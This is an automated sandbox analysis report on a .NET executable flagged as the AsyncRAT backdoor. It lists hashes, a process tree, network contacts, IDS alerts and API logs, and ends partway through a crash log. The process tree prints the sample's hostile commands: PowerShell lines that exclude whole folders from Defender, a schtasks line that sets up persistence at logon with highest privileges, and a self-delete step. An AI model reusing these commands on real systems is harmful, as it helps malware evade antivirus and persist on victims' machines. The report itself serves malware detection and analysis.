Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 14, 2021, 4:14 p.m.	Sept. 14, 2021, 4:16 p.m.

Size	432.5KB
Type	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`26ec7418203795762f728e143977d350`
SHA256	`338624127da652feafe2bb0f900026b970815cd68001921dd62f0877acdb2058`
CRC32	`7155F6DE`
ssdeep	`12288:44klT97iieFM2hujh//USGu3VKSxhDezgf8Vvt3hFmh2h74:4f3jhk`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description)

Sponsing.exe "C:\Users\test22\AppData\Local\Temp\Sponsing.exe"
1116
- Sponsing.exe C:\Users\test22\AppData\Local\Temp\Sponsing.exe
  2076
  - fl.exe "C:\Users\test22\AppData\Local\Temp\fl.exe"
    2288
    - cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      2088
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        204
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
        844
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
        2616
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        932
    - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\fl.exe"
      2264
      - svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\fl.exe"
        1408
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
        412
        
        schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
        2772
        
        services32.exe "C:\Windows\system32\services32.exe"
        1304
        
        cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        2248
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        1852
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
        2232
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
        2868
        
        svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
        2528
        
        cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
        540
        
        choice.exe choice /C Y /N /D Y /T 3
        2760

Name	Response	Post-Analysis Lookup
a0575239.xsph.ru	A 141.8.194.74	141.8.194.74
api.ip.sb	CNAME api.ip.sb.cdn.cloudflare.net A 104.26.13.31 A 104.26.12.31 A 172.67.75.172	104.26.13.31

IP Address	Status	Action
141.8.194.74	Active	Moloch
164.124.101.2	Active	Moloch
172.67.75.172	Active	Moloch
51.254.69.209	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49204 -> 172.67.75.172:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 141.8.194.74:80 -> 192.168.56.101:49212	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 141.8.194.74:80 -> 192.168.56.101:49212	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49204 172.67.75.172:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	7d:9f:08:6e:96:fc:4c:1d:eb:94:53:45:8a:6c:7e:e7:c1:69:47:e9

Queries for the computername (40 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 14, 2021, 4:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 14, 2021, 4:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 14, 2021, 4:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 4:16 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (17 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 14, 2021, 4:14 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:14 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:14 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:14 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:14 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:14 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:15 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:15 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:15 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:15 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:15 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:15 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:15 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:16 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:16 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:16 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 4:16 p.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Sept. 14, 2021, 4:15 p.m.	buffer: SUCCESS: The scheduled task "services32" has successfully been created. console_handle: 0x0000000000000007	1	1	0
WriteConsoleW Sept. 14, 2021, 4:15 p.m.	buffer: Y console_handle: 0x0000000000000007	1	1	0

Uses Windows APIs to generate a cryptographic key (50 out of 200 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 14, 2021, 4:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e3df8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e3e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e3e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00343870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00343870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003438f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x060301d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x060301d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06030090 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06030550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06030590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06030590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002a00d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000315360 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000315360 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000315360 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b855790 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b855790 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b855870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b855870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b855870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b855870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b855bf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b855bf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b855bf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b855800 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b855800 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b855800 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856050 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856050 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856050 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856050 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856050 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856050 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856050 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856050 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856130 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856130 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856130 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8561a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8561a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856210 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856210 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8561a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8561a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8561a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856520 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856520 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856590 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 4:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b856590 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 14, 2021, 4:14 p.m.		1	1	0

One or more processes crashed (13 events)

Time & API	Arguments	Status
__exception__ Sept. 14, 2021, 4:14 p.m.	stacktrace: 0xb4564a 0xb455c5 0xb41955 0xb416b0 0xb40070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x720a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x720b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x720b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72167610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x736ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb456d9 registers.esp: 3009912 registers.edi: 37456872 registers.eax: 0 registers.ebp: 3009936 registers.edx: 3238200 registers.ebx: 36185560 registers.esi: 37457052 registers.ecx: 0	1
__exception__ Sept. 14, 2021, 4:14 p.m.	stacktrace: 0xb46bd7 0xb46b19 0xb46235 0xb45cb2 0xb45c29 0xb419bf 0xb416b0 0xb40070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x720a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x720b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x720b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72167610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x736ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d4 c7 45 e4 00 00 00 00 c7 45 e8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb47098 registers.esp: 3009640 registers.edi: 38411478 registers.eax: 0 registers.ebp: 3009692 registers.edx: 81876724 registers.ebx: 38411328 registers.esi: 38411548 registers.ecx: 81877248	1
__exception__ Sept. 14, 2021, 4:14 p.m.	stacktrace: 0xb46bd7 0xb46b19 0xb46235 0xb45cb2 0xb45c29 0xb419bf 0xb416b0 0xb40070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x720a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x720b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x720b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72167610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x736ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d4 c7 45 e4 00 00 00 00 c7 45 e8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb47098 registers.esp: 3009640 registers.edi: 39377242 registers.eax: 0 registers.ebp: 3009692 registers.edx: 81876724 registers.ebx: 39377092 registers.esi: 39377312 registers.ecx: 81877248	1
__exception__ Sept. 14, 2021, 4:14 p.m.	stacktrace: 0xb46bd7 0xb46b19 0xb46235 0xb45cb2 0xb45c29 0xb419bf 0xb416b0 0xb40070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x720a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x720b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x720b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72167610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x736ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d4 c7 45 e4 00 00 00 00 c7 45 e8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb47098 registers.esp: 3009640 registers.edi: 40330030 registers.eax: 0 registers.ebp: 3009692 registers.edx: 81876724 registers.ebx: 40329880 registers.esi: 40330100 registers.ecx: 81877248	1
__exception__ Sept. 14, 2021, 4:14 p.m.	stacktrace: 0xb48a36 0xb48989 0xb462aa 0xb45cb2 0xb45c29 0xb419bf 0xb416b0 0xb40070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x720a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x720b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x720b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72167610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x736ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d4 c7 45 e4 00 00 00 00 c7 45 e8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 